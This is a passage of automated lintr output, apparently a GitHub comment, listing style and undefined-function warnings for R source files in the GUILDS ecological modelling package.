spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:110:68:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J - 1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                   ^\n```\n[R/drawLocal.R:112:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:117:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:121:12:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n           ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:42:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                         ^~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L16) *style:* **Use two spaces to indent, never 